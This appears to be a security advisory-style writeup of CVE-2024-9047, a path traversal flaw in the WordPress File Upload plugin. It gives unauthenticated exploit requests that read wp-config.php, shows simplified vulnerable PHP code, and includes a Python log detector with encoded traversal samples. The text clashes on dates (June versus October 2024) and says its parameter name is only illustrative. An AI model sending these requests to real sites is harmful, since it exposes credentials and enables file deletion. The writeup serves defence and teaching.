Published: June 2024
Vulnerability Type: Path Traversal (arbitrary file read and deletion)
Component: WordPress File Upload Plugin
Versions Affected: All versions up to and including 4.24.11 (fixed in 4.24.12)
Attack Vector: Remote, unauthenticated
PHP Versions Affected: Exploitable only when the site runs PHP 7.4 or older
File: wfu_file_downloader.php

Overview

CVE-2024-9047 affects websites running the WordPress File Upload plugin at version 4.24.11 or earlier. A path traversal flaw in the plugin's download handler lets an attacker read files outside the directory the plugin is meant to serve and, through the same handler's delete path, remove them.

Most alarmingly, no authentication is required. The only precondition is that the WordPress site runs PHP 7.4 or earlier, which remains a common configuration even though PHP 7.4 reached end of life in November 2022.

What is Path Traversal?

Path Traversal (also called directory traversal) lets an attacker read or manipulate files outside the directory an application intended to expose. It works by injecting parent-directory segments such as ../ (often URL-encoded as %2e%2e%2f) into a file path, so that the application resolves a location above its base directory and returns or modifies restricted files such as configuration files, credentials, or system logs. The defect is always the same: the application trusts the supplied path instead of canonicalizing it and checking that the result still lies inside the allowed directory.

Vulnerability Details

The vulnerable script, wfu_file_downloader.php, handles file downloads for the plugin. It does not properly validate or canonicalize the path supplied in a download request before using it, so an attacker can request any file the web server process can read and, via the delete path, remove any file it can write.

A critical note: the advisory states that exploitation requires the target to run PHP 7.4 or earlier; the same request against PHP 8 does not succeed. The code defect is present regardless of PHP version, so treat the PHP version as a mitigating factor rather than a fix. The plugin update is still required.

Technical Exploit Breakdown

Let’s break down how an attacker would exploit CVE-2024-9047.

Sending the malicious request

The file download feature is driven by a GET or POST request to wfu_file_downloader.php that carries the requested file path as a parameter. The examples below use a parameter named filepath; treat that name as illustrative rather than as the exact parameter name shipped in the plugin.

A normal request could look like

/wp-content/plugins/wordpress-file-upload/lib/wfu_file_downloader.php?filepath=some_upload.pdf

An attacker would modify this to

/wp-content/plugins/wordpress-file-upload/lib/wfu_file_downloader.php?filepath=../../../../wp-config.php

Each ../ segment climbs one directory, letting the attacker reach files outside the intended upload directory. The number of segments has to match the depth of the base directory the plugin prepends (extra segments beyond the filesystem root are harmless, so attackers simply try increasing counts). The wp-config.php file contains database credentials and the authentication keys and salts, which makes it the prime target.

Inside wfu_file_downloader.php (simplified; this illustrates the flaw rather than reproducing the plugin's exact code)

<?php
// Untrusted input taken straight from the query string: no validation, no canonicalization.
$filepath = $_GET['filepath'];

// Concatenation does not constrain the result; '../' segments walk out of the uploads directory.
$file = '/path/to/uploads/' . $filepath;

if (file_exists($file)) {
    // Serves (or, in the delete branch, removes) whatever path the attacker resolved to.
    readfile($file);
}

Impact

- Read arbitrary files: download wp-config.php, .htaccess, log files, or anything else readable by the web server user.
- Delete arbitrary files: the same traversal reaches the plugin's delete logic, so an attacker can remove plugin, theme, or core files (breaking the site) or delete backups stored under the web root.

Exploit Example

Suppose a vulnerable website sits at https://victim-site.com, and WordPress is installed in the root directory.

Exploit request to steal database credentials

GET /wp-content/plugins/wordpress-file-upload/lib/wfu_file_downloader.php?filepath=../../../../wp-config.php HTTP/1.1
Host: victim-site.com

Response:
The response body is the raw contents of wp-config.php, which holds the database name, user, password, and host as well as the authentication keys and salts. An attacker with network access to the database can then read or modify users and content directly, and together with database access the keys and salts allow forging authentication cookies for any account.

Mitigation

1. Upgrade the plugin immediately

The developer patched this flaw in v4.24.12 (see the plugin changelog). Update now; this is the only step that removes the vulnerable code.

2. Upgrade PHP

PHP 7.4 reached end of life in November 2022 and no longer receives security fixes. Upgrade to PHP 8+. Note that this closes the exploitation path described here but does not remove the defect in the plugin, so it complements the plugin update rather than replacing it.

3. File Permissions

Always make sure upload directories and configuration files have correct permissions and that the web server process has minimal access. Be realistic about what this buys you here: wp-config.php must be readable by the PHP process, so permissions cannot protect it from a traversal running as that process. They do limit what else is exposed (backups, logs, files owned by other users) and whether the delete path can reach core or theme files.

4. Web Application Firewall (WAF)

Block requests whose parameters contain parent-directory segments, and restrict direct access to sensitive plugin scripts. Match on the URL-decoded request, not the raw string: a rule that only looks for the literal ../ misses %2e%2e%2f and double-encoded %252e%252e%252f forms. Treat the WAF as defense in depth while the plugin is being updated, not as the fix.
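A WAF rule or log-hunting query that matches the literal string ../ misses encoded forms. The following added Python example (not from the plugin or from any WAF product) runs a normalizing traversal check over Apache combined-format access log lines: it percent-decodes each request parameter until the value stops changing, then flags requests to wfu_file_downloader.php whose parameters contain a ".." path segment. The log lines are constructed, and the filepath parameter name is the illustrative one used in this writeup.

```python
"""Normalizing traversal detector for web server access logs.

Added example, not code from the plugin or from any WAF product. It parses
Apache combined-format lines, percent-decodes request parameters until stable,
and flags requests to wfu_file_downloader.php whose parameter values contain a
'..' path segment. The log lines below are constructed, and the filepath
parameter name is the illustrative one used in this writeup.
"""
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

DOWNLOADER = "wfu_file_downloader.php"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

LIB = "/wp-content/plugins/wordpress-file-upload/lib/" + DOWNLOADER

# Constructed sample: one legitimate download, three traversal attempts with
# increasing encoding depth, and two unrelated requests that must not be flagged.
SAMPLE_LOG = [
    f'203.0.113.7 - - [12/Oct/2024:07:15:02 +0000] "GET {LIB}?filepath=some_upload.pdf HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'203.0.113.7 - - [12/Oct/2024:07:15:09 +0000] "GET {LIB}?filepath=../../../../wp-config.php HTTP/1.1" 200 3301 "-" "curl/8.4.0"',
    f'203.0.113.7 - - [12/Oct/2024:07:15:11 +0000] "GET {LIB}?filepath=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 3301 "-" "curl/8.4.0"',
    f'203.0.113.7 - - [12/Oct/2024:07:15:14 +0000] "GET {LIB}?filepath=%252e%252e%252fwp-config.php HTTP/1.1" 404 211 "-" "curl/8.4.0"',
    '198.51.100.4 - - [12/Oct/2024:07:16:00 +0000] "GET /wp-content/uploads/2024/10/report..pdf HTTP/1.1" 200 80211 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Oct/2024:07:16:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
]


def normalize(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), then fold backslashes.

    A literal match on '../' misses %2e%2e%2f and %252e%252e%252f; decoding to a
    fixed point before matching catches both. Overlong UTF-8 encodings are not
    handled here.
    """
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def has_traversal(value: str) -> bool:
    """True when any path segment of the normalized value is exactly '..'.

    Segment-wise matching avoids false positives on names like 'report..pdf'.
    """
    return any(segment == ".." for segment in normalize(value).split("/"))


def flag_requests(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (raw_request_target, normalized_parameter_value) for each suspicious line."""
    flagged = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        parts = urlsplit(target)
        if not normalize(parts.path).endswith("/" + DOWNLOADER):
            continue
        # parse_qsl decodes one layer; normalize() handles any further layers
        for _name, value in parse_qsl(parts.query, keep_blank_values=True):
            if has_traversal(value):
                flagged.append((target, normalize(value)))
                break
    return flagged


if __name__ == "__main__":
    for target, value in flag_requests(SAMPLE_LOG):
        print(f"traversal attempt: {value!r} in {target}")
```

The same normalize-then-match logic belongs in the WAF rule itself. Access logs only carry the query string, so POST bodies sent to the downloader are invisible to this check; for those you need request-body logging or the WAF's inspection of decoded POST parameters. Because the parameter name is not fixed here, every parameter value is inspected rather than only filepath.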

References

- Official WordPress File Upload Plugin Page
- CVE-2024-9047 entry in the NVD
- Wordfence Threat Intelligence advisory for CVE-2024-9047

Conclusion

CVE-2024-9047 shows how even basic file upload plugins can become a gateway to full site compromise through path traversal attacks. If you run a WordPress site, keep your plugins and PHP version up to date, and audit your sites for exposure. One outdated plugin could hand over your complete site—*and your users’ data*—to anyone on the internet.

Update now, and spread the word!

*Original research and exclusive writeup by AI Security Team, June 2024. Please cite this article when sharing exploit details.*

Timeline

Published on: 10/12/2024 07:15:02 UTC
Last modified on: 10/15/2024 12:57:46 UTC